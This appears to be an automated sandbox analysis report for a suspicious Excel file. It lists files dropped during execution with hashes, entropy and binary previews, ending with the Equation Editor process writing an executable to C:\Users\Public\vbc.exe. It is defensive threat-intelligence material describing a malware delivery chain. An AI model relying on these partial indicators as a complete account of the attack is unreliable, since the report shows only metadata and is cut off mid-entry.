Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5220394.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B706F95.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7788
Entropy (8bit):	5.524090807303161
Encrypted:	false
SSDEEP:	96:wxd+CHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:w/GTrZuloOSGZboS/C93n+KuI
MD5:	2DC1FA3D143AF37AE6BF32BD5279807F
SHA1:	E05DF2F3C52920261D04185E2949F0D4AC29DE94
SHA-256:	5A2D38ACF3A1466C315DDCB11D93687194B9771D706D797AB8007D1EE17F1AC3
SHA-512:	E6EB334AC9664DDA7A3AD084903C789D4999DA0099514D007ADDBE47F3F6AF11CCC47D5173B60E08563C967BF23E0751B108C918EC0BC54008694C52BB784D6D
Malicious:	false
Preview:	....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................@.6.).X.......d......................p....p....\..................p.......<5.u..p....`.p.A@.$y.w..;...............w..;.$.......d.......T...^.p.....^.p..;...;..<;.....-.......<.w................<.9u.Z.v....X.n.....A@........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFF102BC.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1049B6B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D04FC42A.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09B8670.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE70FDC8.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8123834020823337
Encrypted:	false
SSDEEP:	3072:z34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:74UcLe0JOcXuunhqcS
MD5:	1934AF66FCAFE8AE17EFC6A270BB4D70
SHA1:	FBA1DD045B0D867585F8BE0356944307317C889B
SHA-256:	F494B606D36A5E5CF2BB51773659EB2AA54EC39AEE92988D5B1DE68426251DAC
SHA-512:	FFE9390608A0E6029601EF9DCB6C0C46BD8F6BE7DCB213DECB15FB4EFAA6FB947BC606A32CF9FCE97306AE136CB5C8794E7C65E085537D058332A9515AFD3334
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$.....o..f.Y.@..%.....o...o.....\|.o...o.RQ$[\|.o.t.o.......o.`.o.$Q$[\|.o.t.o. ...Id.Yt.o.\|.o. ............d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...t.o...o..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA4CF16.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F07481F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4F5B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4F5C.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4F5D.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoFB8E.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoFB8F.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoFBBF.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\Desktop\~$ORDER.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	6.627142296963667
Encrypted:	false
